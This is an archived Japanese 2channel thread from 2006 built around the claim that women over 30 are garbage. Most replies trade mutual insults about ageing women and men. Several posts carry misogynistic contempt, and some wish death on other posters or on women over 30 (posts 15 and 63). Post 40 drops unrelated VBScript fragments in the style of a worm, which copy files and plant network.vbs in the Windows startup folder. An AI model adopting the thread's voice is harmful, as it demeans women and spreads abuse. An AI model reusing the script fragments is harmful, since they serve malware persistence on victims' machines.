2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

   まぁ女は30歳過ぎたら只のゴミだからさ

1 :名無しさん@Before→After:2006/09/05(火) 04:54:40 ID:TRj6ka8G
安心しろw

女の賞味期限は短いww ババァに用はないのでなwww

2 :名無しさん@Before→After:2006/09/06(水) 09:30:02 ID:EGhVK2BY
それはまぁ男の場合、ある意味あるな。
俺も今年30だが、パートナーは同い年かいっこ違い(上でも下でも)
ぐらいの人が良いと思っているよ。
結婚したい男には、30過ぎた女は魅力なもんさ。
要は顔・体じゃない。‥"心"さ。

君も年いけば分かるよ。

3 :名無しさん@Before→After:2006/09/07(木) 06:43:39 ID:7wTfRwYE
何が「心」だアホ。要は自分も相手も老いて醜くなった上での「妥協」じゃねーか
ゴミ

本当に「心」なら若いうちから心重視だろ

自己陶酔してんなゴミ

4 :名無しさん@Before→After:2006/09/07(木) 11:55:22 ID:yt9JqpmL
お前ら可愛そうな奴らだな。こ〜ゆ〜チンカス野郎どもは いい女を知らない、女にもてた事ない可愛そうな奴。どうせ誰からも相手にされてないんだよ。哀れだわ。

5 :名無しさん@Before→After:2006/09/07(木) 13:24:49 ID:+dqCimTO
良スレ

6 :名無しさん@Before→After:2006/09/07(木) 13:29:51 ID:IrSkzrRb
早くして結婚しているやつはやつで猫殺しが好きな人格障害者だったりするんだがなw

7 :名無しさん@Before→After:2006/09/07(木) 13:32:01 ID:IrSkzrRb
目は口ほどに物を言う→そんなことあるわけないじゃない
十を聞いて一さえも理解しない低知能の猫殺し犯

8 :名無しさん@Before→After:2006/09/07(木) 14:03:04 ID:t3j5NVg9
年を重ねる程魅力的な女になってく人は沢山いるよ。
このスレたてた>>1の周りには腹の出た中年オバさんしかいないのかも知れないけどさ。


9 :名無しさん@Before→After:2006/09/07(木) 14:23:49 ID:ftvLZagG
>>1なんてネズミにも相手にされねw


10 :名無しさん@Before→After:2006/09/07(木) 14:23:57 ID:yt9JqpmL
このスレたてたチンカス野郎とそれに同意するカスたち。スレみただけでモテナイぶ男。だれからも相手にされないのが一目瞭然。笑えるな。

11 :名無しさん@Before→After:2006/09/07(木) 14:31:01 ID:4MFPjjQY
>>1 みんな、こんな奴の相手をするのはやめろ。スルーだ。何を言っても考えは変わらないんだから。言うだけ無駄。勝手にそう思わせておけ。

12 :名無しさん@Before→After:2006/09/07(木) 14:51:30 ID:t3j5NVg9
このスレも只のゴミだからね。


13 :名無しさん@Before→After:2006/09/07(木) 15:10:55 ID:ftvLZagG
>>11も同類
なにがスルーだ。だったらこんな糞スレ立てんなバーカ

14 :名無しさん@Before→After:2006/09/07(木) 15:13:19 ID:XbiPdRZ/
私はまだ26才ですが、私の大好きなひーたんは
『女は30からだ』
って言われました。
ひーたんは立派ですね〜。
私も30才になって、ひーたんと付き合いたい。

15 :名無しさん@Before→After:2006/09/07(木) 15:18:04 ID:ig07aJc6
>>14
その前に氏んだ方がいいよ

16 :名無しさん@Before→After:2006/09/07(木) 15:35:31 ID:ftvLZagG
終了

17 :名無しさん@Before→After:2006/09/07(木) 16:35:15 ID:S2Ju7bBw
ひーたんて
わからない

18 :名無しさん@Before→After:2006/09/07(木) 16:38:26 ID:yt9JqpmL
なんだかんだ言って日本がロリ社会なんだよ。ヨーロッパなんか行ったら若いコなんかは振り向きもされないぞっ。1は頭悪いのが分かる。お前みたいのがいるから日本はバカにされるんだ。

19 :名無しさん@Before→After:2006/09/07(木) 17:27:26 ID:sX9/We+7
沢尻の書き込み

507 :通行人さん@無名タレント:2006/09/02(土) 21:40:13 ID:JarHtf7n
>>501
ADフゼイが何を言ってんだかwwwTV番組上最末端の一番ペーペーに人権も権利もないんだよ!演者がいなきゃ成り立たないけど、ADなら腐る程いる
それが嫌なら偉くなれ!ADはTV局内では人以下の存在だよ、イッチョ前に口きくなカス

20 :名無しさん@Before→After:2006/09/07(木) 22:08:16 ID:ftvLZagG
>>19
沢尻が言ったって事??

21 :名無しさん@Before→After:2006/09/08(金) 01:46:39 ID:o9vXqleX
  >安心しろw
女の賞味期限は短いww ババァに用はないのでなwww

普通、こんな言葉言う奴がゴミだろ



22 :名無しさん@Before→After:2006/09/08(金) 01:52:27 ID:KPXiDYzp
そういうあなたも通る道!!WW

23 :名無しさん@Before→After:2006/09/08(金) 02:15:02 ID:tUBGsBFU
男の賞味期限も似たりよったり。
あとは熟成するか腐敗するかは個人差。
まあ、自分を必要としてくれてる人以外にまで
認めてもらおう、なんて思う程は若くないから安心しろ。

24 :名無しさん@Before→After:2006/09/08(金) 13:01:37 ID:o9vXqleX
くだらんスレ。

25 :名無しさん@Before→After:2006/09/08(金) 13:42:18 ID:w9hRe95x
>>1はきっと男のふりしたブス女だよ
自分がすでに終わってるから少しでも他人を落としめたいんだよ

26 :名無しさん@Before→After:2006/09/08(金) 13:49:07 ID:nAqPpbVw
男でも女でも 不細工なのは100パだな。

27 :名無しさん@Before→After:2006/09/08(金) 15:23:11 ID:NDc0wp9C
30才でごみ扱いか〜!
厳しいな〜(-.-;)

でもそー言われないために日々努力しろと言う事だよね!頑張ります!

私流で言うと30過ぎて土台の出来てない男こそがごみだと思うわよ。

28 :名無しさん@Before→After:2006/09/08(金) 22:07:11 ID:o9vXqleX
ごみとは言われたくないね
じゃあ>>1を産んだ母親はごみなんだ??

29 :名無しさん@Before→After:2006/09/09(土) 03:58:57 ID:PvncCi3v
30過ぎた女で生きる価値があるのは
頭脳明晰容姿端麗くらいだな
30までに結婚できなければ女は終わりだろ

30 :名無しさん@Before→After:2006/09/09(土) 05:12:19 ID:5kgv7yLf
頭脳明晰、容姿端麗の女は、何も好き好んで、自分より年収と知能の低い男と結婚する必要なし。
30過ぎで結婚しない女は終わりという男って、コンプの塊?

31 :名無しさん@Before→After:2006/09/09(土) 12:27:54 ID:AEusf9AQ
>>29
大正生まれの人??
貴重だねw

32 :名無しさん@Before→After:2006/09/12(火) 04:51:27 ID:9GZ+ts/z
男も30過ぎたら終わりだよ^^:
髪は薄くなってくるしおなかは出るし・・・
女の人で30過ぎてても綺麗な人はいっぱいいるけど
男は30過ぎてかっこ良い人あんまりいないーーーー






33 :名無しさん@Before→After:2006/09/12(火) 05:03:41 ID:3Qk9nGIM
スレタイ見ただけでスレの流れが想像できたが思った通りだなw

34 :名無しさん@Before→After:2006/09/12(火) 11:43:26 ID:tQVrzc6e
>>33
バーカ

35 :名無しさん@Before→After:2006/09/12(火) 12:03:06 ID:y14VOpDr
男の30過ぎは臭い

36 :名無しさん@Before→After:2006/09/12(火) 21:46:59 ID:CdSAIE0m
佐藤浩一とか中井貴一とか好きだなあ。
真田浩之とか中村吉右衛門とかもいいな〜。
ジャ○ーズとかち〜っともかっこいいと思わないんだな。

37 :名無しさん@Before→After:2006/10/08(日) 01:09:08 ID:/u2RUhVq
年齢コンプレックスの男はこういうスレを頻繁に立てるよな
でも、こういうスレをわざわざ見つけて読んでる奴らも
1と同等に年齢コンプであることに気づいた方がいい・・・



38 :名無しさん@Before→After:2006/10/11(水) 22:36:14 ID:5kQCczVB
http://img1.mixi.jp/photo/bbs_comm/3/64/44660364_41.jpg

20代でも只のゴミ

39 :名無しさん@Before→After:2006/10/14(土) 22:02:28 ID:0uT4aAOe
/

40 :名無しさん@Before→After:2006/10/18(水) 10:17:37 ID:nLtMhcTb
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"


41 :名無しさん@Before→After:2006/10/18(水) 16:57:59 ID:dlzcqpgB
てs

42 :らん:2006/10/26(木) 23:28:46 ID:wn0ZyfaE
でもさ、男もいい年したシワシワのおっさんなのに仕事場近くの若い店員さんに、ニヤニヤ商品の事聞くふりして話して喜んでる人いるよね。冷たくあしらわれてるけど。それもちょっとなぁ。自分の奥さん大切にした方がいいんじゃ。あの人キモイッって更衣室でよくいわれてるし。

43 :名無しさん@Before→After:2006/11/16(木) 00:55:02 ID:SvuASeYg
職場に39歳のバツいち子供3人のひといてさ 凄い綺麗 性格は男なんだけど。
若くて可愛い子いっぱいいるけど社長と今つきあってて結婚するみたい。
それから、海外の友達からは私34なんだけどまだまだこれからよ〜っていわれた。
要は男からみた女の価値観だと思う。若い子いいなら若い子とつきあrばいいし
30過ぎても魅力的って思えるひといたらつきあえばいいし。
30過ぎたらゴミだのくだらない。これから何年も人生あるのにゴミ扱いすような
価値観のひとっておかしい。人間は中身もそして外見も綺麗に越したことないけど。
みんな年とるわけだし ジャネットジャクソンは歳はただの番号っていってたよ。



44 :名無しさん@Before→After:2006/11/16(木) 02:14:54 ID:yigQRKjb
男にとってはゴミだろうな〜異性対象から外れるから!だから早く男捕まえた女が生涯幸せになりやすい〜

45 :名無しさん@Before→After:2006/11/16(木) 03:03:53 ID:my1wHuNx
男も30過ぎたら女にとっちゃゴミだよ
腹出でくるし臭いし正にゴミだねw
まぁ変らず素敵な人はいるけどね

46 :名無しさん@Before→After:2006/11/16(木) 06:15:00 ID:0AldpooC
>>45
ハゲドー

女より男のほうが年齢重ねると醜いし臭いよw

見た目素敵に見えるおじさんも、やっぱおばさんより臭いもんwww


ハゲたオッサンや歯無しジジィは最悪な臭いするし、生ゴミ以下www

47 :名無しさん@Before→After:2006/11/17(金) 01:27:40 ID:UoGwYPcw
そうそう、30過ぎても女のほうが身だしなみに気を使うからオヤジよりいいよ。

48 :名無しさん@Before→After:2006/11/17(金) 02:46:06 ID:TY8qQjWV
バカかお前ら!女はルックスで生きていくしか幸せないが男はそれ以外の方が許容範囲が広いんだよ〜それに男は女みたいに恋愛したいんじゃなくヤレればいいから、そんなのお金で解決できるんだよ〜お前らの感情などどうでもいいの

49 :名無しさん@Before→After:2006/11/17(金) 20:16:52 ID:O8RCVFRG
>>48
クセーのとはやらねw

50 :名無しさん@Before→After:2006/11/17(金) 21:55:51 ID:U0MB/DUM
>>49 あははっクセーって w 久々に笑かしていただきやした☆ 大賛成!!            >>48そんなお前となんて誰もやらね〜よってな w

51 :名無しさん@Before→After:2006/11/18(土) 01:25:53 ID:xtHZg7lh
30過ぎた男は、キモイ奴多いなマジで!
ハゲ、デプ、臭い、水虫
タムシ
だっせ〜
きもすぎ〜
腹ですぎなんだよ!
汗かきすぎなんだよ!
エロいんだよ!


52 :名無しさん@Before→After:2006/11/18(土) 01:32:00 ID:rIxwTxdj
>1の母親がゴミなんだろうね

53 :よくわかってんじゃん:2006/11/18(土) 02:55:39 ID:o5bjNSu0
30過ぎたら終わりだよ〜俺ホストやってるけど高い金出してもらっても断る時ある〜妙に垂れた胸押し付けてきやがって汚くてしょうがねぇ

54 :名無しさん@Before→After:2006/11/18(土) 03:10:40 ID:mIKbzr6h
なんでホストなんてやってんの?
低学歴なの?

ホストこそ30過ぎたらゴミだろ

55 :名無しさん@Before→After:2006/11/18(土) 04:36:17 ID:o5bjNSu0
スカウトされた!〜福山雅治似ってよく言われる〜女は30過ぎたらっていうか俺的には25までが限界〜ババアは人間だけど女じゃない〜俺はルックスいいから30過ぎても若い女取っ替え引っ替えできるし、すぐヤらしてくれる

56 :名無しさん@Before→After:2006/11/18(土) 04:43:35 ID:3CzrR6Ty
ホストなんてピンからキリまで居る!
女を30過ぎたらゴミとかほざいてるお前なんざぁ〜ホストとは名ばかりの、皿洗いか?一流のプロ意識持ったホストは口が裂けてもそんな事思わないぞ

57 :名無しさん@Before→After:2006/11/18(土) 04:48:34 ID:3CzrR6Ty
もう一つ付け加えておけばてめーはその、お客さんから金もらって生きてる訳だ、悔しかったら他の仕事でそんだけの金稼いでみせろや!出来なきゃ田舎にさっさとケツまくって帰れよ!このカッペが

58 :名無しさん@Before→After:2006/11/18(土) 04:54:36 ID:3CzrR6Ty
ピンドン入りました〜!
なんて馬鹿の一つ覚えじゃあるめーし、
ケツが青いんだよ!この腐れ小僧が ボケ

59 :名無しさん@Before→After:2006/11/18(土) 09:31:27 ID:tUGhfUq/
つ〜かこのホスト>>1じゃね?!w        モテモテのホストさんは2chなんぞやらんやろ〜w

60 :名無しさん@Before→After:2006/11/18(土) 11:13:09 ID:gELIoxoX
自称ホストが粘着しているスレ 笑
月収10万円!チーン

61 :名無しさん@Before→After:2006/11/18(土) 13:29:24 ID:tUGhfUq/
南無〜〃〃 自分が立ち上げたスレに誰一人味方がいない w        あわれですなぁ〜w

62 :名無しさん@Before→After:2006/11/18(土) 13:52:58 ID:c5F5uqsk
>>55
馬鹿丸出しでカッコ悪いレスだって事に本人が気付く日は来るのだろうか?

すごくみっともないw

63 :名無しさん@Before→After:2006/11/18(土) 15:07:37 ID:hP85L01d
30女は死ね

64 :名無しさん@Before→After:2006/11/18(土) 15:27:29 ID:64/p7QcU
>>62
同感。自意識過剰も良い所だね。こんな書き込みする暇あったら営業電話でもしたら??
電話する客いないし、暇だからここに来てると思われ…。

65 :名無しさん@Before→After:2006/11/18(土) 15:47:02 ID:GBEe9CtU
男女いくら若くても、超ブタ禿不細工って食えないしな
30過ぎても食えるもんは食える
食えないもんは食えないってことだわかったか?
年齢じゃなくて容姿とか雰囲気とか好みが色々あるだろ。

66 :名無しさん@Before→After:2006/11/18(土) 15:49:13 ID:qnZy81ve
アメリカで行われた研究によって、精子の質は男性の年齢と共に劣化することが分かった。
 男性の高齢化が進むほど、生まれてくる子供が先天的小人症に苦しむリスクが高まるのだという。
 
 国立ローレンス・リヴァモア研究所の研究チームは、22歳から80歳の男性約100人の精液中のDNAを分析した。調査対象には、タバコを吸わない、かつ生殖能力に問題のない男性らが選ばれた。
 
 研究者らは、DNAの損傷と染色体異常は年齢と共に増加することに注目した。
 遺伝子の突然変異による小人症、すなわち「軟骨形成不全症」の発症率は、男性が1年歳をとるごとに2%ずつ増加するのだという。



67 :名無しさん@Before→After:2006/11/18(土) 15:50:35 ID:qnZy81ve
AP通信によると、米マウントシナイ医科大学のエイブラハム・
ライヘンバーグ博士を中心とする共同研究チームは、イスラエル人を対象とした調査で、
父親が40歳以上の時に生まれた新生児が自閉症になる確率は、同年齢未満の父親の場合に比べて、
1.5-6倍も高いとの研究結果を発表した。同発表は4日発売の米精神医学専門誌「Archives of
General Psychiatry」(アーカイブズ・オブ・ゼネラル・サイキアトリィ)の9月号に掲載されたもの。

  同調査には1980年代に生まれた13万人のイスラエルのユダヤ人とコロンビア大学、イスラエル
の大学・学術機関の研究者が参加したが、父親が40歳以上の新生児は、自閉症や関連の症例が
30歳未満の父親の場合の約6倍で、30―39歳の父親と比較すると1.5倍以上だった。一方、母親に
ついては、高齢者で多少の影響を及ぼす可能性は排除できないものの、子供の自閉症に与える
影響はほとんど認められなかったという。

68 :名無しさん@Before→After:2006/11/18(土) 18:13:48 ID:zVqmBOqx
53はホストじゃないから!金曜の夜に2ちゃんやってる水商売の人はいないよ(>_<)私はキャバだけど金曜の夜は忙しいから強制的に出されるから(^^;)とくにホストは厳しいから書き込みしてる暇はないよ。てか、53はニートだから!!

69 :名無しさん@Before→After:2006/11/20(月) 02:16:34 ID:w2nSko0N
今日30歳誕生日♀


70 :名無しさん@Before→After:2006/12/26(火) 17:26:23 ID:Fvydm/M0
30から25に若返る方法ってあります?

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)